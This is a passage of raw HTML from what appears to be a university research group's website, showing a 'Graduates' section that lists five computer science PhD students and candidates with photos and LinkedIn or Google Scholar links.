gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c147-outer\">\n            <div data-colibri-id=\"182-c147\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c147 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c148\" class=\"h-global-transition-all h-heading style-862 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c148\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c74\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c74 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-854 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\" class=\"wp-image-1742 style-854-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-902 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-855 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-849 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\" class=\"wp-image-1744 style-849-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-901 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-853 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-856 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg\" class=\"wp-image-1745 style-856-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-852 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-857 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\" class=\"wp-image-1754 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student, MS Graduate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\" class=\"wp-image-1756 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student, MS Graduate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 